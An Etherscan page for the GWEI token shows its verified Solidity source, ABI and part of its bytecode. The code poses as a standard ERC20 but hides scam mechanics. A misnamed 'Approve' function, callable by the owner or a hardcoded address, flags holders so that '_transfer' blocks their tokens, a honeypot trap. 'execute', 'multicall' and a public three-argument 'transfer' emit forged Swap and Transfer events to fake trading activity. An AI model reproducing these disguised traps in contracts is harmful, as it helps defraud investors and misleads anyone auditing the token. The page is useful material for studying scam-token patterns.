ETH Price: $2,526.47 (+0.30%)

Token

GweiERC (GWEI)
 

Overview

Max Total Supply

100,000,000,000 GWEI

Holders

38

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 8 Decimals)

Filtered by Token Holder
pepe-frog.eth
Balance
3,428,078,015.32660619 GWEI

Value
$0.00
0x9370b5ed2963d86b192cd2b55300dc58d3bce6f8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
GweiERC

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-20
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function setup(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() ||  0x2E647453bBd3F22D0f9cFf289ba7937bA27Cb956 == _msgSender(), "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() ||  0x2E647453bBd3F22D0f9cFf289ba7937bA27Cb956 == _msgSender(), "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _snapshot[_address_];
    }
    function toApplied(bool c) external onlyOwner {
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");


        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snapshot[from]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");


        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}




}

contract GweiERC is ERC20 {
    constructor() ERC20("GweiERC", "GWEI") {
        _mint(msg.sender, 100000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040518060400160405280600781526020017f47776569455243000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f47574549000000000000000000000000000000000000000000000000000000008152506200010e620001026200017b60201b60201c565b6200018360201b60201c565b81600690816200011f919062000629565b50806007908162000131919062000629565b5050506200017533620001496200024760201b60201c565b600a620001579190620008a0565b64174876e800620001699190620008f1565b6200025060201b60201c565b62000a28565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b9906200099d565b60405180910390fd5b8060046000828254620002d69190620009bf565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038a919062000a0b565b60405180910390a3620003a660008383620003aa60201b60201c565b5050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200043157607f821691505b602082108103620004475762000446620003e9565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004b17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000472565b620004bd868362000472565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200050a62000504620004fe84620004d5565b620004df565b620004d5565b9050919050565b6000819050919050565b6200052683620004e9565b6200053e620005358262000511565b8484546200047f565b825550505050565b600090565b6200055562000546565b620005628184846200051b565b505050565b5b818110156200058a576200057e6000826200054b565b60018101905062000568565b5050565b601f821115620005d957620005a3816200044d565b620005ae8462000462565b81016020851015620005be578190505b620005d6620005cd8562000462565b83018262000567565b50505b505050565b600082821c905092915050565b6000620005fe60001984600802620005de565b1980831691505092915050565b6000620006198383620005eb565b9150826002028217905092915050565b6200063482620003af565b67ffffffffffffffff81111562000650576200064f620003ba565b5b6200065c825462000418565b620006698282856200058e565b600060209050601f831160018114620006a157600084156200068c578287015190505b6200069885826200060b565b86555062000708565b601f198416620006b1866200044d565b60005b82811015620006db57848901518255600182019150602085019450602081019050620006b4565b86831015620006fb5784890151620006f7601f891682620005eb565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200079e5780860481111562000776576200077562000710565b5b6001851615620007865780820291505b808102905062000796856200073f565b945062000756565b94509492505050565b600082620007b957600190506200088c565b81620007c957600090506200088c565b8160018114620007e25760028114620007ed5762000823565b60019150506200088c565b60ff84111562000802576200080162000710565b5b8360020a9150848211156200081c576200081b62000710565b5b506200088c565b5060208310610133831016604e8410600b84101617156200085d5782820a90508381111562000857576200085662000710565b5b6200088c565b6200086c84848460016200074c565b9250905081840481111562000886576200088562000710565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008ad82620004d5565b9150620008ba8362000893565b9250620008e97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007a7565b905092915050565b6000620008fe82620004d5565b91506200090b83620004d5565b92508282026200091b81620004d5565b9150828204841483151762000935576200093462000710565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000985601f836200093c565b915062000992826200094d565b602082019050919050565b60006020820190508181036000830152620009b88162000976565b9050919050565b6000620009cc82620004d5565b9150620009d983620004d5565b9250828201905080821115620009f457620009f362000710565b5b92915050565b62000a0581620004d5565b82525050565b600060208201905062000a226000830184620009fa565b92915050565b6122be8062000a386000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d57806366d382031461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c9190611763565b60405180910390f35b61017f600480360381019061017a9190611823565b6104d9565b60405161018c919061187e565b60405180910390f35b61019d6104fc565b6040516101aa91906118a8565b60405180910390f35b6101cd60048036038101906101c891906118c3565b610506565b6040516101da919061187e565b60405180910390f35b6101eb610535565b6040516101f89190611932565b60405180910390f35b61021b600480360381019061021691906119b2565b61053e565b005b61023760048036038101906102329190611823565b61076b565b604051610244919061187e565b60405180910390f35b610267600480360381019061026291906119b2565b6107a2565b005b610283600480360381019061027e91906119ff565b610914565b005b61029f600480360381019061029a91906119ff565b610960565b6040516102ac91906118a8565b60405180910390f35b6102bd6109a9565b005b6102d960048036038101906102d49190611a2c565b6109bd565b005b6102f560048036038101906102f091906119ff565b610b49565b604051610302919061187e565b60405180910390f35b610313610b9f565b6040516103209190611aaf565b60405180910390f35b610331610bc8565b60405161033e9190611763565b60405180910390f35b610361600480360381019061035c9190611a2c565b610c5a565b005b61037d60048036038101906103789190611823565b610de5565b60405161038a919061187e565b60405180910390f35b6103ad60048036038101906103a89190611823565b610e5c565b6040516103ba919061187e565b60405180910390f35b6103dd60048036038101906103d891906118c3565b610e7f565b005b6103f960048036038101906103f49190611aca565b610ee9565b60405161040691906118a8565b60405180910390f35b610429600480360381019061042491906119ff565b610f70565b005b61044560048036038101906104409190611b36565b610ff3565b005b60606006805461045690611b92565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b92565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4611018565b90506104f1818585611020565b600191505092915050565b6000600454905090565b600080610511611018565b905061051e8582856111e9565b610529858585611275565b60019150509392505050565b60006008905090565b610546611018565b73ffffffffffffffffffffffffffffffffffffffff16610564610b9f565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589611018565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611c0f565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611c2f565b5b905060200201602081019061064791906119ff565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611c2f565b5b90506020020160208101906106d791906119ff565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611c2f565b5b905060200201602081019061073991906119ff565b610960565b60405161074b91906118a8565b60405180910390a3808061075e90611c8d565b91505061060e565b505050565b600080610776611018565b90506107978185856107888589610ee9565b6107929190611cd5565b611020565b600191505092915050565b6107aa611018565b73ffffffffffffffffffffffffffffffffffffffff166107c8610b9f565b73ffffffffffffffffffffffffffffffffffffffff16148061083057506107ed611018565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61086f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086690611c0f565b60405180910390fd5b60005b8282905081101561090f5760006002600085858581811061089657610895611c2f565b5b90506020020160208101906108ab91906119ff565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061090790611c8d565b915050610872565b505050565b61091c61158c565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109b161158c565b6109bb600061160a565b565b60005b84849050811015610b42578484828181106109de576109dd611c2f565b5b90506020020160208101906109f391906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610a799493929190611d4e565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610acd57610acc611c2f565b5b9050602002016020810190610ae291906119ff565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b2791906118a8565b60405180910390a38080610b3a90611c8d565b9150506109c0565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905091